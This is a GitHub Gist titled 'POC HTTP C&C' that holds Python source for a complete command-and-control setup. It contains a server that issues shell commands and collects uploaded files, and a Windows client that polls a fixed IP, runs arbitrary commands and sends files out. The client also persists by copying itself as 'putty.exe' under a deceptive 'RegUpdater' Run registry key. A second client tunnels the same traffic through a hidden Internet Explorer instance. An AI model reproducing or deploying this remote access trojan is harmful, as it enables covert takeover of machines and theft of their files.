Created
May 7, 2018 03:42
-
-
Save macostag/159bec1334599cbb846ceaf079b1dae3 to your computer and use it in GitHub Desktop.
POC HTTP C&C
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # HTTP SERVER | |
| #-------------------------------------------- | |
| import BaseHTTPServer | |
| import os, cgi | |
| HOST_NAME = '172.16.20.201' | |
| PORT_NUMBER = 80 | |
| class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): | |
| def do_GET(s): | |
| command = raw_input("Shell> ") | |
| s.send_response(200) | |
| s.send_header("Content-type", "text/html") | |
| s.end_headers() | |
| s.wfile.write(command) | |
| def do_POST(s): | |
| if s.path == '/info': | |
| try: | |
| ctype, pdict = cgi.parse_header(s.headers.getheader('content-type')) | |
| if ctype == 'multipart/form-data' : | |
| fs = cgi.FieldStorage( fp = s.rfile,headers = s.headers,environ={ 'REQUEST_METHOD':'POST' }) | |
| else: | |
| print "[-] Unexpected POST request" | |
| fs_up = fs['file'] | |
| with open('/root/Desktop/1', 'wb') as o: | |
| o.write( fs_up.file.read() ) | |
| s.send_response(200) | |
| s.end_headers() | |
| except Exception as e: | |
| print e | |
| return | |
| s.send_response(200) | |
| s.end_headers() | |
| length = int(s.headers['Content-Length']) | |
| postVar = s.rfile.read(length ) | |
| print postVar | |
| if __name__ == '__main__': | |
| server_class = BaseHTTPServer.HTTPServer | |
| httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler) | |
| try: | |
| httpd.serve_forever() | |
| except KeyboardInterrupt: | |
| print '[!] Server is terminated' | |
| httpd.server_close() | |
| #HTTP CLIENT | |
| #-------------------------------------------- | |
| import requests | |
| import subprocess | |
| import os | |
| import time | |
| import shutil | |
| import _winreg as wreg | |
| import random | |
| def httpConnect(): | |
| while True: | |
| req = requests.get('http://172.16.20.201') | |
| command = req.text | |
| if 'terminate' in command: | |
| return 1 | |
| elif 'grab' in command: | |
| grab,path=command.split('*') | |
| if os.path.exists(path): | |
| url = 'http://172.16.20.201/info' | |
| files = {'file': open(path, 'rb')} | |
| r = requests.post(url, files=files) | |
| else: | |
| post_response = requests.post(url='http://172.16.20.201', data='[-] Not able to find the file !') | |
| elif 'persistence' in command: | |
| path = os.getcwd().strip('/n') | |
| Null,userprof = subprocess.check_output('set USERPROFILE', shell=True).split('=') | |
| destination = userprof.strip('\n\r') + '\\Documents\\' +'putty.exe' | |
| if not os.path.exists(destination): | |
| shutil.copyfile(path+'\putty.exe', destination) | |
| key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run",0,wreg.KEY_ALL_ACCESS) | |
| wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ,destination) | |
| key.Close() | |
| post_response = requests.post(url='http://172.16.20.201', data="[*] Persistence completed!") | |
| elif 'cd' in command: | |
| code,directory = command.split(' ') | |
| os.chdir(directory) | |
| cwd="[+] CWD is " + os.getcwd() | |
| post_response = requests.post(url='http://172.16.20.201', data=cwd) | |
| else: | |
| CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) | |
| post_response = requests.post(url='http://172.16.20.201', data=CMD.stdout.read()) | |
| post_response = requests.post(url='http://172.16.20.201', data=CMD.stderr.read()) | |
| time.sleep(3) | |
| #def main(): | |
| while True: | |
| try: | |
| if httpConnect() == 1: | |
| break | |
| except: | |
| sleep_for = random.randrange(1, 10) | |
| print "[*] Error to connect C&C server trying to connect in :" + str(sleep_for) + "seconds..." | |
| pass | |
| #if __name__ == "__main__": | |
| # main() | |
| #IE COM CLIENT | |
| #-------------------------------------------- | |
| from win32com.client import Dispatch | |
| from time import sleep | |
| import subprocess | |
| ie = Dispatch("InternetExplorer.Application") | |
| ie.Visible = 0 | |
| dURL = "http://172.16.20.201" | |
| flags = 0 | |
| targetFrame = "" | |
| while True: | |
| ie.Navigate("http://172.16.20.201") | |
| while ie.ReadyState != 4: | |
| sleep(1) | |
| command = ie.Document.body.innerHTML | |
| command = unicode(command) | |
| command = command.encode('ascii','ignore') | |
| print ' [+] Get command: ' + command | |
| if 'terminate' in command: | |
| ie.Quit() | |
| break | |
| else: | |
| cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) | |
| data = cmd.stdout.read() | |
| postData = buffer(data) | |
| ie.Navigate( dURL, flags, targetFrame, postData ) | |
| sleep(3) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment